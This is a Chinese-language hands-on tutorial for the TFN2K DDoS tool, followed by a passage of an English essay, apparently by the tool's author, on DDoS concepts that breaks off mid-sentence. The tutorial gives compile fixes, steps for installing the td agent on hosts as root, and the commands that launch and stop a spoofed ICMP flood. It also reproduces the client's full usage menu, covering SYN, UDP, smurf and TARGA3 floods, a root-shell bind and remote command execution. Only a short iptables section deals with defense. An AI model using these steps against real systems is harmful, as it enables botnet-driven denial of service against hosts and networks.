tfn2k 实战.doc

TFN2K实战1.TFN2K的攻击体系。TFN2K德国黑客Mixter编写应该算是DDOS攻击中的代表作，其所能实现的功能让人瞠目结舌，叹为观止.(对它的敬畏有如滔滔江水，延续不绝.)来看看它的架构。主控端-运行tfn客户端，来遥控并指定攻击目标，更改攻击方法.(罪大恶极)代理端-被植入并运行td进程的牺牲品，接受tfn的指挥，攻击的实施者.需要注意的是，一个攻击者，往往控制多台代理来完成攻击，而且其系统多为unix,linux等.(可怜的牺牲品）目标主机-被攻击的主机或网络，曾经被DDOS的有Yahoo、Amazon、CNN、e-bay等.(最大的受害者，郁闷如我)2.tfn2k特性。 主控端通过TCP、UDP、ICMP或随机性使用其中之一(默认.随机)的数据包向代理端主机发送命令,攻击方法包括TCP/SYN、UDP、ICMP/PING、混合攻击、TARGA3等。 主控端与代理端的通讯采取单向，即主控端只向代理端发送命令，并且会采取随机的头信息，甚至虚拟的源地址信息,代理端不会逆向向主控端发送任何信息. 所有命令经过CAST-256算法加命,其关键字即编译程序时的输入的口令.并且这个口令做为唯一认证凭证. 利用td进程，主控端可以远程执行shell命令. td进程的名称可以在编译时更改,更便于隐藏. tfn可以编译运行于win32及linux系统的.至于伪造源IP地址等功能，更是基本功能，并且其与老版本的tfn相比，它的发包效率更高，我自已的测试，在短短不到5分钟，两台代理机，使我的redhat linux 9.0系统瘫痪.三.tfn2k 实战测试1.测试环境:软件：redhat linux 9.0硬件平台：master:IP: PIV2.4/256*2/rtl8139Ag1 :IP: PIV2.4/256*/rtl8139AG2 : IP: pIV2.6/512*2/3c905AIM: pIV2.66c/512*2/3c905switch: D_link des 1024R1.下载tfn2k.tgz2.解压： tar zxvf tfn2k.tgz 3.修改文件A. src/Makefile 如果你的系统是linux系统，不需要做任何修就可以，如果是win32系统，请将# Linux / *BSD* / OthersCC = gccCFLAGS = -Wall -O3CLIBS =这几行注释掉,并将# Win32 (cygwin)#CC = gcc#CFLAGS = -Wall -DWINDOZE -O2#CLIBS =这几行的注释去掉.因为我的测试系统为redhat linux 9.0所以并未做任何修改.B. src/config.h ，默认的就可以用，如果感兴趣，可以照其注释信息进行调整。C. src/ip.h 这里要做一些修改，否则编译会有错误，发生重复定义。/*struct in_addrunsigned long int s_addr;*/注意啊我可是将它放在/* */之间，也就是注释掉了:)D.更改编译器：因为tfn2k支持的是egcs-1.1.2-30,而redhat linux 9.0所包含的是gcc-3.2.2-5,所以如果不替换掉gcc，tfn2k是编译不过去的.需要注意的是，更改之后，有可能会造成基于gcc3.2.2的软件编译不去,请谨慎而行.方法很简单的，找到一张redhat linux 6.2安装盘,将egcs-1.1.2-30.rpm、cpp-1.1.2-30.rpm拷到/cd /mnt/cdrom/Redhat/RPMScp egcs-1.1.2-30* cpp-1.1.2-30* /安装cpp rpm -Uvh -nodeps -oldpackage cpp-1.1.2-30.i386.rpm安装egcs rpm -Uvh egcs-1.1.2-30.i386.rpm (如果提示有误，用nodeps、oldpackages、ignoreos等参数忽略过去就是了）4.编译tfn2kcd tfn2k/srcmake首先会谈出一个声明，你必须接受，之后会提示输入8-32位密码,前边提到过，这是唯一的认证凭证，会被分发于td进程中，所以一定要记牢噢。编译通过后，会产生td及tfn，这就是大名鼎鼎的tfn2k啦,td是守护进程，用来安装在代理中的，而tfn就是控制端.5.安装td.将td上传到我的两台代理,ag1()和ag2() ，因为我只不过测试，所以用的是合法的root来上传并执行td进程的，如果真要找到并安装一个代理，你可能得费点儿神，因为没有一个管理员会说“come on baby .我给你root,来安装td做代理吧”roottest / ftp Connected to .530 Please login with USER and PASS.530 Please login with USER and PASS.Name (:root): wjpfjy331 Please specify the password.Password:230 Login successful. Have fun.Remote system type is UNIX.Using binary mode to transfer files.ftp put td (上传td)local: td remote: td227 Entering Passive Mode (192,168,0,3,198,225)553 Could not create file.ftp by (退出ftp)221 Goodbye.roottest /ssh 登陆到ag1 以执行td ,注意，我用的是root帐户，这样才有足够的权限来执行它.roots password:Last login: Tue Feb 24 06:51:13 2004root ag1 /find / -name td -print 找到刚上传过来的文件td.root ag1 wjpfjy/chmod a+x td 使之具有执行权限.root ag1 wjpfjy/./td 运行td ，这样你就拥有一个代理了，它会对你唯命是从的:(。用同样的方法在ag2 ()上安装并运行TFN2k进程td.6.攻击开始(悲惨的回忆上演中.)回到master( )，准备演练.rootmaster root#touch host.txt 建立代理记录文件(因为如果你足够无聊的话，有可能会建立很多的肉鸡代理，不记下会忘记的噢.)rootmaster rootecho host.txt 将执行过td的ag1加入host.txt。rootmaster rootecho host.txt 添加ag2到host.txt .先来测试一下链接。rootmaster root./tfn -f host.txt -c 10 -i mkdir wjpfjy 与host.txt中的代理通讯，让其执行命令mkdir wjpfjy即建立一个目录Protocol : randomSource IP : randomClient input : listCommand : execute remote commandPassword verification:这里，会被提示输入密码，也就是编译时输入的密码,如果错了，将无法与td进程通讯Sending out packets: .到ag1和ag2看看有没有建立目录名wjpfjy，一般情况下,会存在于td的同一目录,如果不确定，可以用find / -name wjpfjy -print来查找rootmaster root./tfn -f host.txt -c 6 -i 开始ICMP/PING 攻击aim.(可怜我的P4啊，不到5分钟,就跟386一样慢)，不过它在game over前，还是很艰辛的记录下了攻击数据,也算是对得住的那NK大洋啦.这是tcpdump的抓包记录.rootaim root# tcpdump -r pack.atta -c 4 -xX08:03:36.524907 icmp: echo request ttl 00x0000 4500 005c 659d 0000 0001 d22e 172b ab00 E.e.+.0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 .0x0020 0000 0000 0000 0000 0000 0000 0000 0000 .0x0030 0000 0000 0000 0000 0000 0000 0000 0000 .0x0040 0000 0000 0000 0000 0000 0000 0000 0000 .0x0050 0000 .08:03:36.524933 : icmp: echo reply0x0000 4500 005c a5d5 0000 4001 51f6 c0a8 0002 E.Q.0x0010 172b ab00 0000 ffff 0000 0000 0000 0000 .+.0x0020 0000 0000 0000 0000 0000 0000 0000 0000 .0x0030 0000 0000 0000 0000 0000 0000 0000 0000 .0x0040 0000 0000 0000 0000 0000 0000 0000 0000 .0x0050 0000 .08:03:36.524944 : icmp: echo request ttl 00x0000 4500 005c 659d 0000 0001 ed6e 24eb 8200 E.e.n$.0x0010 c0a8 0002 0800 f7ff 0000 0000 0000 0000 .0x0020 0000 0000 0000 0000 0000 0000 0000 0000 .0x0030 0000 0000 0000 0000 0000 0000 0000 0000 .0x0040 0000 0000 0000 0000 0000 0000 0000 0000 .0x0050 0000 .08:03:36.524984 : icmp: echo reply0x0000 4500 005c 551c 0000 4001 bdef c0a8 0002 E.U.0x0010 24eb 8200 0000 ffff 0000 0000 0000 0000 $.0x0020 0000 0000 0000 0000 0000 0000 0000 0000 .0x0030 0000 0000 0000 0000 0000 0000 0000 0000 .0x0040 0000 0000 0000 0000 0000 0000 0000 0000 .rootmaster root./tfn -f host.txt -c 0 停止攻击Protocol : randomSource IP : randomClient input : listCommand : stop floodingPassword verification:Sending out packets: .当然还有别的攻击方法，你只要用-c X就可以更改攻击方法.rootmaster root./tfnusage: ./tfn -P protocol Protocol for server communication. Can be ICMP, UDP or TCP.Uses a random protocol as default-D n Send out n bogus requests for each real one to decoy targets-S host/ip Specify your source IP. Randomly spoofed by default, you needto use your real IP if you are behind spoof-filtering routers-f hostlist Filename containing a list of hosts with TFN servers to contact-h hostname To contact only a single host running a TFN server-i target string Contains options/targets separated by , see below-p port A TCP destination port can be specified for SYN floods 0 - Halt all current floods on server(s) immediately1 - Change IP antispoof-level (evade rfc2267 filtering)usage: -i 0 (fully spoofed) to -i 3 (/24 host bytes spoofed)2 - Change Packet size, usage: -i 3 - Bind root shell to a port, usage: -i 4 - UDP flood, usage: -i victimvictim2victim3.5 - TCP/SYN flood, usage: -i victim. -p destination port6 - ICMP/PING flood, usage: -i victim.7 - ICMP/SMURF flood, usage: -i victimbroadcastbroadcast2.8 - MIX flood (UDP/TCP/ICMP interchanged), usage: -i victim.9 - TARGA3 flood (IP stack penetration), usage: -i victim.10 - Blindly execute remote shell command, usage -i command四.TFN2K防守办法就如同网上所有介绍DDOS的文章一样，DDOS防不胜防，我试着用防火墙过滤掉所有icmp包，来保护我的主机，但所实现的，只是我的主机晚点儿崩溃而已.哎，别指望我来防DDOS,要能防，我也不用不睡觉啊:( 还是那句老话，我们能做的，就是尽量让我们的主机不成为别人攻击的代理，并对intranet 内出行的包进行严格限制，尽量不去危害别人，只要大家都这样做，我们的网络环境才可以安全一些，至少，我可以安心睡几天觉.附上我防火墙的一部分.主要是针对ICMP/PING的，不过用处不太大:(/sbin/iptables -P INPUT DROP/sbin/iptables -A INPUT -i lo -p all -j ACCEPT/sbin/iptables -A INPUT -i eth1 -p icmp -j ACCEPT/sbin/iptables -A INPUT -p icmp -icmp-type 8 -j DROP/sbin/iptables -A INPUT -s -i lo -j ACCEPT/sbin/iptables -A INPUT -s -i eth0 -j DROP/sbin/iptables -A INPUT -s $LAN_NET/24 -i eth0 -j DROP/sbin/iptables -A INPUT -s /12 -i eth0 -j DROP/sbin/iptables -A INPUT -s /8 -i eth0 -j DROP/sbin/iptables -A INPUT -i eth0 -m limit -limit 1/sec -limit-burst 5 -j ACCEPT/sbin/iptables -A INPUT -i eth0 -p udp -mstate -state NEW -j REJECT/sbin/iptables -A INPUT -p tcp -dport 22 -j ACCEPT/sbin/iptables -A INPUT -p tcp -dport 80 -j ACCEPT/sbin/iptables -A INPUT -p tcp -i eth1 -dport 53 -j ACCEPT/sbin/iptables -A INPUT -p udp -i eth1 -dport 53 -j ACCEPT/sbin/iptables -A INPUT -p tcp -i eth0 -m state -state ESTABLISHED,RELATED -m tcp -dport 1024: -j ACCEPT/sbin/iptables -A INPUT -p udp -i eth0 -m state -state ESTABLISHED,RELATED -m udp -dport 1024: -j ACCEPT/sbin/iptables -A INPUT -p icmp -icmp-type echo-request -j LOG -log-level 2/sbin/iptables -A INPUT -i eth0 -p icmp -icmp-type echo-request -j DROP/sbin/iptables -A INPUT -p tcp -m multiport -destination-port 135,137,138,139 -j LOG/sbin/iptables -A INPUT -p udp -m multiport -destination-port 135,137,138,139-j LOG/sbin/iptables -A INPUT -i eth0 -p tcp -dport 2000 -j ACCEPT/sbin/iptables -A INPUT -i eth0 -p tcp -dport 2001 -j ACCEPT/sbin/iptables -A INPUT -p tcp -i eth1 -m state -state ESTABLISHED,RELATED -m tcp -dport 1024: -j ACCEPTTFN3KTribe Flood Network 3000: A theoretical reviewof what exactly Distributed DOS tools are, how they can be used, what more dangerous features can be implemented in the future, and starting points on establishing Network Intrusion Detection Rules for DDOS.Many technically uninformed people consider DDOS as a weapon, that should notbe publicly evolved and distributed. This is the only further thing Ill bereleasing to explain DDOS tools, comprehensible for EVERYONE, and futurefeatures that may be implemented in DDOS: a brief theoretical description.BTW: People with technical knowledge may skip over the most stuff in I. and II.I. What is distributed DOS, what can it be used for, how does it operate?II. What are DDOS features, what are future DDOS features, how is DDOS evolving?III. DDOS, an exploit or not? Should it be published? What is the main problem?IV. How can DDOS traffic be detected by Network Intrusion Detection (NIDS)?I.What is distributed DOS?Distributed DOS, like any distributed concept, will make it easy to coordinatea procedure that is launched from many computers. In this case it is DenialOf Service in form of packet flooding, to overload network links.DDOS IS NOT A HACKING TOOL CATEGORY. Distributed DOS tools are PENETRATIONtools. They do not exploit security vulnerabilities, but they can demonstratewhat amount of traffic a host can or cannot handle. Distributed DOS has beenused a long time by professional security consultants for penetration testing.Before there were DDOS attack tools, there have been commercial, non-open-sourceprograms out that could launch distributed packet floods. Those were used in theinformation security consulting business, to perform a security service calledCapacity Management. The purpose of Capacity Management is to determine howmuch traffic a network can handle, to see if the targets bandwidth has to beimproved, or if it can handle enough traffic while providing service reliably.What can it be used for?It can overload, or flood if you want, network links. It sends meaninglesspackets, the overall amount of data being more that the network can process.The impact is that the targets can not be reached over a network. That is all.How does it operate?The basic concept is that you install a huge amount of DOS servers on differenthosts. They will await commands from a central client. A central client can thenmessage all the servers, and instruct them to send as many traffic as they canto one target. The tool distributes the work of flooding a target amongst allavailable DOS servers, therefore it is called a distributed concept.Before these tools were available, an attacker (or penetration tester) wouldhave to telnet into all the hosts that he wanted to use, log in as a user,and manually launch a command to flood a target on each of the hosts thatshould flood, for example using the UNIX standard tool ping: ping -f targetII.What are DDOS features?The actual attack tools dont do simple flooding, but variations of it whichinvolves using actual weaknesses in a protocol to a) make an attack morepowerful b) make an attack harder to track back. First, current DDOS toolsspoof source addresses. They are sending raw IP packets, and due to thenature of the internet protocol the source addresses can be fake ones, andsingle (not connection oriented) packets will still reach their destination.This is basically what makes backtracking of the attacks so hard. DDOS isalso exploiting protocol weaknesses, it for example can open up half-openTCP connections by SYN flooding. This is a very old and well known protocolvulnerability, and feasible countermeasures are present. To make attacks morepowerful, DDOS can generally use any protocol vulnerability that can beexploited by sending single, not connection oriented packet traffic to a host.What are future DDOS features?Things that can still be implemented, but have not in publicized tools,are protocol vulnerabilities as mentioned above. One of those is the streamattack (discovered by Tim Yardley, stream.c and spank.c demonstrate thevulnerability and are public). Stream attack sends TCP packets with eitherACK or both SYN and ACK flags set. Because they are not part of a connection,they will confuse a target machine and take some time to be processed bythe operating system. If this attack is used in a distributed way, the attackercan overload machines with less hosts. From what Ive heard, distributed streamattack IS already implemented in private DDOS tools. It is very trivial toimplement this feature. Possibility 2 that is not implemented yet aremulticast addresses. Multicast addresses are routed (forwarded) specially byrouters, they can multiply one packet into several ones. The concept would beto send out packets with a multicast (224.x.x.x) source. A target could sendan error message back to multicast destinations, and multiply the bandwidth.This concept has also been mentioned by Tim Yardley. Another concept couldbe to purposefully send special strings in the flood traffic, strings thatIntrusion Detection Systems (IDS) could falsely interpret as break-in attempts,the impact would be false alarms and affected IDS could get overloaded or crash.How is DDOS evolving?As I mentioned, the first tools that did distributed denial of service werecommercial penetration tools. The origin of using general DOS is certainlyIRC (Internet Relay Chat), where kiddies can take over control of channels ifthey temporarily take out computer systems with DOS. The first packet floodingDOS that involved multiple servers flooding was smurf. Smurfing relied onmis-configured networks replying back to a broadcast address, sending onepacket would result in hundreds bouncing back. Then, most of those networkswere fixed, and attackers compromised a lot of hosts, preferrably hosts withhigh bandwidth, and started flooding manually from them. Because this tooka lot of time, attackers wrote servers which they installed on the hoststhey had compromised. They no longer needed to log in, but only message thoseservers. The DDOS attack tools I know of are, in chronological release order:fapi (private, by ?), blitznet (public, by phreeon), trinoo (private, byphifli), TFN (public, by me), stacheldraht (private, by randomizer), shaft(private, by ?), TFN2K (public, by me), Trank (TRinoo + spANK.c?, private).The recent development has also continued in other ways, since people weremonitoring traffic for very DDOS-program-specific traffic (like known characterstrings, known passwords, default ports), there have been many small variationsmade to the code of the above tools, by attackers, to prevent being detected.III.DDOS, an exploit or not?No. DDOS itself is not an exploit. It just makes an existing concept moreeasy. Take the RC5 challenge and distributed password crackers.They are not exploits. But they are exposing a weakness, that many passwordscan be brute forced faster than people think. DDOS shows that many networksare not as strong as they seem to be and can be overloaded faster than peopleused to think. Additionally, there are actual exploits implemented in DDOSexploits, that exploit security holes in network protocols currently usedon the Internet. These security holes must not necessarily be exploited tomake DDOS possible, but they do make the impact of DDOS attacks more powerful.Such exploits are the possibility of arbitrarily spoofing IP addresses, SYNflooding, IP stack attacks with bad fragmentation, header offsets and othermagic packets, the stream vulnerability, and missing authentication andsecurity of traffic known as connection-less or stateless.Should it be published?That is for you to decide. It is your personal opinion. But people willcontinue to publish vulnerabilities. Hundreds of talented security analystsare professionally researching vulnerabilities in software, and postingexploit programs, which can often be used to instantly compromise a systemrunning the vulnerable software at root level. The past has shown, that sincesecurity vulnerabilities were a problem on the internet, people have beenignoring advisories containing only the information THAT something wasvulnerable to an attack, disregarding them as being completely theoretic.Only when people wrote up and posted ready-to-(ab)use vulnerabilityexploits, the severity of vulnerabilities became clear, and people wouldmake an effort to counter those vulnerabilities.What is the main problem?The main problem, that made attacks against sites as big as possible, is the bad overall security on the internet. With ONLY a DDOStool in his hands, Joe Attacker cannot do anything. But security vulnerabilitiesare omni-present on the majority of hosts on the net. An awful lot of thesehosts are not caring about their security,